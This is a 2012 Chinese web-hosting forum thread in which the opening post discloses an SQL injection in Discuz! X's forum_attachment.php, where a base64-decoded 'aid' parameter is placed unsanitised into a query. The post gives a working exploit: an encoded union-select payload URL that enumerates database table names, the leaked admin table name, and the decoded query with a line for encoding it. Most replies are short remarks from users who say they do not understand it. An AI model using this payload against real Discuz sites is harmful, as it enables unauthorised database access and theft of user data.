全球主机交流论坛
标题:
看看这个dzx 小洞
[打印本页]
作者:
master
时间:
2012-3-12 23:51
标题:
看看这个dzx 小洞
文件:source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|',
base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table
('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach
['tid']);
}
变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。
http://www.xxxx.net/forum.php?
mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tI
ElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FI
Gxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址
http://www.xxxx.net/forum.php?
mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
实际查询为:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where
TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
作者:
ㄒiger
时间:
2012-3-12 23:52
……小白不懂……
作者:
一步一杀
时间:
2012-3-12 23:54
……小白不懂……
作者:
sjc
时间:
2012-3-12 23:55
一步一杀 发表于 2012-3-12 23:54
……小白不懂……
作者:
Jetso
时间:
2012-3-12 23:55
技术活
作者:
0x59
时间:
2012-3-12 23:55
不错 ,惯例 送上美女
作者:
dalky
时间:
2012-3-12 23:55
……小白不懂……
作者:
light
时间:
2012-3-12 23:56
……小白不懂……
作者:
xspoco
时间:
2012-3-13 00:04
qun来舔
作者:
快乐居士
时间:
2012-3-13 00:05
技术活。楼主别阴我啊
作者:
machine
时间:
2012-3-13 00:05
qun让开,美女给我舔
作者:
kwx
时间:
2012-3-13 00:05
作者:
heibudong
时间:
2012-3-13 00:07
hostloc 已经失效
作者:
东方星雨
时间:
2012-3-13 00:08
0x59 发表于 2012-3-12 23:55
不错 ,惯例 送上美女
今晚睡不着了
作者:
shineme
时间:
2012-3-13 00:08
技术活 不懂
作者:
失足大叔
时间:
2012-3-13 00:09
……小白不懂……
作者:
mslxd
时间:
2012-3-13 00:15
没看懂,,,,怎么可以的啊?
作者:
mfch666
时间:
2012-3-14 02:11
大白也不懂
作者:
maidd88
时间:
2012-3-14 08:47
很是不懂
作者:
苁林老鬼
时间:
2012-3-14 08:49
又出漏洞啊
欢迎光临 全球主机交流论坛 (https://443502.xyz/)
Powered by Discuz! X3.4